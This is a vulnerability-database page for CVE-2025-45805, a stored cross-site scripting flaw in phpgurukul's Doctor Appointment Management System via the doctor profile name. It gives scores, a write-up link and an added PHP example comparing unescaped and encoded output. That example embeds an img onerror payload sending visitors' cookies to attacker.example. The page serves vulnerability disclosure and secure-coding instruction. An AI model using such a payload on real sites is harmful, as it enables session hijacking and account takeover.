CVE-2025-45805

HIGH

phpgurukul Doctor Appointment Management System 1.0 - Authenticated Stored Cross-Site Scripting via Doctor Profile Name

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-45805. PoC published by mohammed-alsaqqaf.

AI-analyzed exploit summary: This repository contains a writeup for CVE-2025-45805, a stored XSS vulnerability in the Doctor Appointment Management System by phpgurukul. The vulnerability allows authenticated doctor users to inject arbitrary JavaScript code into profile fields, leading to potential account takeover or session hijacking when patients view the booking page.

Description

In phpgurukul Doctor Appointment Management System 1.0, an authenticated doctor user can store arbitrary JavaScript in their profile name. The stored name is later rendered into the booking page without output encoding, so the payload executes in the browser of any visitor who selects that doctor to book an appointment.
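The following is an added example, not code from this page or from phpgurukul's project: it shows in PHP (the application's language) the unescaped-output pattern the description implies beside a hardened version. The advisory does not name the affected source file, so the function names, the field name and the constructed payload are assumptions for illustration; the real fix is to HTML-encode the doctor name wherever it is emitted.

```php
<?php
// Added example for CVE-2025-45805; not the project's own code.
// Function names, the doctor-id parameter and the payload are assumptions.

// Constructed payload of the kind an authenticated doctor could save as their
// profile name. It needs no <script> tag: an <img> with an onerror handler
// fires as soon as the booking page is parsed.
const CANARY_NAME = 'Dr. Smith<img src=x onerror="document.location=\'https://attacker.example/?c=\'+document.cookie">';

// Vulnerable pattern: the stored name is concatenated straight into HTML,
// so the browser treats the attacker's tags as markup.
function render_doctor_option_vulnerable(string $doctorName, int $doctorId): string
{
    return "<option value=\"$doctorId\">$doctorName</option>";
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES escapes both quote characters (required inside attributes),
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of silently returning ''.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_doctor_option_safe(string $doctorName, int $doctorId): string
{
    return '<option value="' . html((string) $doctorId) . '">' . html($doctorName) . '</option>';
}

// Defence in depth on the write side (the profile update handler): reject
// names that cannot plausibly be a person's name. This narrows what can be
// stored but is not a substitute for output encoding, because the same data
// may be rendered in other contexts (admin panels, e-mails, reports).
function is_valid_doctor_name(string $name): bool
{
    // Letters in any script, combining marks, whitespace, period, apostrophe, hyphen.
    return strlen($name) <= 100
        && preg_match('/^[\p{L}\p{M}\s.\'\-]+$/u', $name) === 1;
}

// Demonstration: render the same stored name both ways and show the
// write-side validator's verdict on the payload and on a legitimate name.
echo "Vulnerable rendering:\n", render_doctor_option_vulnerable(CANARY_NAME, 7), "\n\n";
echo "Hardened rendering:\n",   render_doctor_option_safe(CANARY_NAME, 7), "\n\n";
echo "Validator accepts payload:      ", var_export(is_valid_doctor_name(CANARY_NAME), true), "\n";
echo "Validator accepts normal name:  ", var_export(is_valid_doctor_name("Dr. María O'Neil-Smith"), true), "\n";
```

Run it with `php example.php` (PHP 8 or later is assumed). In the hardened output the `<img` sequence appears only as `&lt;img`, which the browser displays as text; the vulnerable output contains the live tag. Apply the same `html()` wrapper to every place the name is echoed, and consider a Content-Security-Policy that disallows inline event handlers as a second layer.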

Exploits (1)

nomisec WRITEUP
by mohammed-alsaqqaf · poc
https://github.com/mohammed-alsaqqaf/CVE-2025-45805

Classification
Writeup 90%
Attack Type
XSS
Complexity
Trivial
Reliability
Reliable
Target: Doctor Appointment Management System v1.0 by phpgurukul
Auth required
Prerequisites: Authenticated access as a doctor user · Victim must visit the booking page
devstral-2 · analyzed Feb 16, 2026

Scores

CVSS v3 7.6
EPSS 0.0036
EPSS Percentile 27.9%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
Note: the vector's PR:N (no privileges required) conflicts with the description and the exploit prerequisites, which both require an authenticated doctor account; with PR:L the same vector scores 6.8 instead of 7.6.

CISA SSVC

Vulnrichment
Exploitation poc
Automatable no
Technical Impact partial

Details

CWE
CWE-79
Status published
Products (1)
phpgurukul/doctor_appointment_management_system 1.0.0
Published Sep 03, 2025
Tracked Since Feb 18, 2026